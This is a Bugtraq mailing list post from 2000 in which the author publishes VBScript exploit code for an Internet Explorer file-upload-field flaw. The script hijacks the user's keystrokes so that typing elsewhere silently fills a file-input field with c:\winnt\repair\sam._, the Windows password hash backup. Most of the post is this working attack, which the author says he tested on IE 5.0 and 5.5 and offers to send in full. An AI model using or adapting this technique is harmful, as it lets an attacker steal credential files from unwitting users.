Bugtraq mailing list archives
Exploit Code for File Input field advisory.
From: Billy Nothern <disk_key () HOTMAIL COM>
Date: Thu, 7 Dec 2000 21:03:50 -0000
I have coded an exploit example for the "File Upload via Form" vulnerability recently mentioned by Microsoft Security. Here's the source for it (well, most of the source). If you would like the whole source, email me. I'll send it as an attachment.

--------------snip------------------

<script language="VBScript">
'A lot of this isn't pretty, I don't have much time for this kind of stuff.
'Make changes as you wish, but be sure to include me (key) in your version.

'Declare stuff
Dim userKey
Dim charCount
Dim getFile
Dim myArray

'67|58|47|87|73|78|78|84|47|82|69|80|65|73|82|47|83|65|77|46|95
'c : \ w i n n t \ r e p a i r \ s a m . _
'Has to be backwards, that's the order I push it into the File field.
'95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67
'_ . m a s \ r i a p e r \ t n n i w \ : c

'Set getFile with the correct keycodes
getFile = "95|46|77|65|83|47|82|73|65|80|69|82|47|84|78|78|73|87|47|58|67"

'ReDim myArray to correct UBound
ReDim myArray(Len(getFile)/3)

'Index of array to use
charCount = 0

'Set myArray with a split version of getFile
myArray = split(getFile, "|")

'This is activated anytime form1.file gains the focus
Sub myFocus()
    document.form1.userInput.focus
End Sub

'This is activated with the onKeyPress event of userInput
Sub myFuncFirst()
    If charCount < (Len(getFile)/3) Then
        'Find the key the user pressed
        userKey = chr(window.event.keyCode)
        'Change that key to the keycode we want
        window.event.keyCode = cint(myArray(charCount))
        'Set focus to form1.file so that our key gets sent to it
        document.form1.file.focus
        'Make userInput reflect the user's change
        document.form1.userInput.value = document.form1.userInput.value + userKey
        'Increment charCount to the next char we want
        charCount = charCount + 1
    End If
End Sub
</script>

----------snip---------

There are some issues to work out, but I believe this is a pretty good example. Hey, it works, doesn't it? Mail me (disk_key<AT>hotmail.com) if you have questions/comments.

I have tested on IE 5.0 and IE 5.5.

Goodbye,
key